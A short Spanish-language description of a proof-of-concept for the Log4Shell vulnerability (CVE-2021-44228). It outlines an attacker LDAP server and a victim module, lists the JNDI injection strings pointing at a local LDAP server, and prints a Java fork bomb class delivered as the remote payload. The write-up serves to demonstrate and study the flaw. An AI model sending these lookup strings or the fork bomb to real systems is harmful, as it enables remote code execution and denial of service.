
💣💥💀 Prueba de concepto: ejemplo de lanzamiento de un fork-bomb en un servidor remoto gracias a la vulnerabilidad CVE-2021-44228
💣💥💀 Proof of Concept: ejemplo de ejecución de una fork bomb en un servidor remoto gracias a la vulnerabilidad CVE-2021-44228
Creamos el servidor LDAP del atacante (módulo server), que entregará representaciones de cadenas y código (módulo payload)
Creamos un ejemplo de víctima (módulo victim) y pasamos a Log4j la cadena Versión JRE <= 6u211, 7u201, 8u191 y 11.0.1
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
La aplicación víctima recibe del servidor atacante un array de bytes y lo interpreta como una cadena a sustituir o como código ejecutable (parámetro com.sun.jndi.ldap.object.trustURLCodebase = true)
Como ejemplo, el código ejecutable será una fork bomb (un programa que lanza copias de sí mismo saturando todo el tiempo de CPU)
public class ForkBomb {
public static void main(String... args) {
Runtime.getRuntime().exec(new String[] {
"javaw",
"-cp",
System.getProperty("java.class.path"),
"ForkBomb"
});
}
}